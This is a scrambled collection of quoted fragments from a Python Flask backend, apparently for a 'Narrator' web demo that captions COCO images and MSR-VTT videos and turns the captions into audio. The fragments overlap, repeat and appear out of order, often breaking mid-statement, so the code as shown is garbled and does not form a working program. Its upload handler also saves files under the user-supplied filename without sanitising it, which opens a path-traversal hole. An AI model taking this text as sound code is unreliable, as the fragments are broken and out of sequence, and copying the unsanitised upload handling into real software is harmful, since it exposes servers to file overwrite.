"+ str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url':",
"\"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render",
"as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return",
"generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8)",
"app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename)",
"rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store",
"images and videos to update im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if",
"cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename,",
"+ cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene",
"from website file = request.files['file'] by_scene = 'by_scene' in request.form # Check if",
"'.csv') # Load scene example SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows():",
"= pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE'])",
"and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return",
"allowed extension.\"\"\" return '.' in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def",
"im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url']",
"narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time':",
"# Load samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT = [[], [],",
"x.capitalize()) # Generate audio files for each caption for i, caption in enumerate(captions):",
"}) print(\"Samples loaded\") # Get filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR']",
"'gt'] = gt print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): #",
"audio files for each caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file",
"coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF",
"x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information",
"'.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe",
"= coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode",
"for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select ids from",
"in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and",
"# Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name,",
"gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt = '' best_score",
"+ str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' + str(i)",
"caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError",
"directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in samples",
"if a file has an allowed extension.\"\"\" return '.' in filename and \\",
"to update im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x]",
"sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files for each caption for i,",
"cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene and redirect to demo_output #",
"Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt']",
"app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest",
"beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio)",
"import Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'],",
"file_path def split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename, ext = file.filename.split('.')",
"file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def",
"filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ,",
"name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples",
"from flask import render_template, request, redirect, url_for, send_from_directory, session from app import app",
"gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image to samples",
"+ '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples loaded\")",
"page.\"\"\" # Check if file is uploaded if request.method == 'POST': try: #",
"file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to",
"return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in samples directory.\"\"\"",
"image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get",
"and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file):",
"ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return 'image' def generate_caption(file,",
"return file_path def split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename, ext =",
"for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example",
"into name and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list): filename =",
"+ str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' })",
"'.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' + str(i) + '.ogg', 'caption':",
"Check if filetype is allowed if file and allowed_file(file.filename): # Fix filename, save",
"= gt print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get",
"file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html',",
"'.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB')",
"VID_SAMPLES_DICT = [[], [], [], []] for i, ix in enumerate(range(16)): im_sample =",
"ext = file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) # Replace existing .",
"homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return",
"print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get",
"caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) #",
"from Narrator import Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'],",
"> 0: # Load image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] +",
"to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio",
"if not os.path.exists(scene_example_file + '.csv'): # Generate captions by scene captions, scene_change_timecodes =",
"caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] =",
"_ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if",
"'' best_score = 0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if",
"as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) #",
"+ str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption':",
"in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select ids from their respective",
"typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in",
"+ '.csv') # Load scene example SCENE_SAMPLES_DICT = [] for i, row in",
"\"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render",
"nearest_gt = '' best_score = 0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt],",
"determine type file.filename = file.filename.replace(' ', '_') file_path = save_file(file) filename, ext =",
"samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [], [],",
"in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for",
"\"\"\"Determine if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene'",
"and store to file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get",
"x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store to file",
"def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def",
"about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo",
"file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE'])",
"page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\"",
"samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT = [[], [], [], []]",
"# Fix filename, save to file, get ext and determine type file.filename =",
"+ 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator # Construct",
"upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in",
"file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return",
"\"\"\" Backend of Narrator web app. \"\"\" import os import sys import shutil",
"# Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8)",
"app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() #",
"generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all gt",
"print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT",
"samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) +",
"'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' +",
"# Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[],",
"'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of",
"= app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all",
"'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) +",
"'.join(caption).capitalize() # Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name +",
"base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try: samplesDF",
"'.ogg' }) print(\"Samples loaded\") # Get filepath for scene example scene_example_file = app.config[",
"by_scene: return 'scene' return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for",
"@app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def",
"Determine images and videos to update im_names = [x for x in app.config['SAMPLES_TO_UPDATE']",
"and redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True,",
"Load samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT = [[], [], [],",
"examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples",
"# Generate caption/audio and redirect to demo_output page if not by_scene: caption =",
"for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score",
"i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption url",
"uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of above --",
"gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt",
"filename + '.' + str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict",
"Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate",
"get ext and determine type file.filename = file.filename.replace(' ', '_') file_path = save_file(file)",
"samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video datasets coco =",
"shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR']",
"'.ogg') # update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption",
"samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT",
"'.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if",
"x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) #",
"'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids if x not in",
"= gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt = ''",
"narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) #",
"', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images')",
"= [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select",
"'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() })",
"return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html',",
"ext = split_filename(file) typ = determine_type(ext, by_scene) if typ == 'image': by_scene =",
"# Generate sample information and store to file for i, (name, im_id) in",
"file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename into",
"for i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video'",
"+ '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio':",
"try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id',",
"not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x",
"vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples loaded\") # Get filepath",
"= scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e)",
"except KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE'])",
"x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the",
"all gt captions and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts",
"'.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode using",
"files for each caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file +",
"app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP",
"= narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt = gt",
"x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] #",
"'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a",
"im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio files narrator.gen_audio_file(",
"allowed_file(file.filename): # Fix filename, save to file, get ext and determine type file.filename",
"gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x:",
"rand_vid_ids)): # Get video and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id +",
"filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file",
"pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) >",
"gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] +",
"name + '.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name +",
"captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i,",
"and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) #",
"Narrator web app. \"\"\" import os import sys import shutil import pandas as",
"not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store to file for",
"if request.method == 'POST': try: # Grab file, and if by_scene is requested",
"x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select ids from their",
"coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file",
"x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt = '' best_score =",
"gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True))",
"file = request.files['file'] by_scene = 'by_scene' in request.form # Check if filetype is",
"as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image',",
"page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\"",
"scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return",
"Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples",
"# Create scene example if it doesn't already exist if not os.path.exists(scene_example_file +",
"by_scene): \"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index')",
"return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename",
"im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix)",
"= Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load",
"i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' +",
"return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return",
"flask import render_template, request, redirect, url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH']",
"vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try: samplesDF = pd.read_csv(",
"############################################################################## def allowed_file(filename): \"\"\"Determine if a file has an allowed extension.\"\"\" return '.'",
"demo page.\"\"\" # Check if file is uploaded if request.method == 'POST': try:",
"generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/')",
"skimage.io as io import PIL from flask import render_template, request, redirect, url_for, send_from_directory,",
"+ str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' +",
"im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({",
"sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file +",
"gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt =",
"False # Generate caption/audio and redirect to demo_output page if not by_scene: caption",
"= filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio,",
"return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene and redirect",
"except KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def",
"not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename +",
"demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict =",
"'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't already exist if",
"from their respective datasets and reject any that already have been # chosen",
"= gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image",
"'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images",
"been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for",
") # Load samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv',",
"Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption']",
"+ name + '.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name,",
"Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'],",
"Load samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except:",
"= [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] +",
"+ str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def",
"title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE'])",
"# Check if file is uploaded if request.method == 'POST': try: # Grab",
"'.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image'",
"narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) + '.ogg') # Save samples dataframe",
"request.files['file'] by_scene = 'by_scene' in request.form # Check if filetype is allowed if",
"caption = ' '.join(caption).capitalize() # Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] +",
"as pd import skimage.io as io import PIL from flask import render_template, request,",
"+ 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update",
"im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i,",
"'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT = [[],",
"best_score: best_score = bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption =",
"+ str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption':",
"select ids from their respective datasets and reject any that already have been",
"+ '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine",
"def allowed_file(filename): \"\"\"Determine if a file has an allowed extension.\"\"\" return '.' in",
"def get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>')",
"gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and save imge",
"app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if",
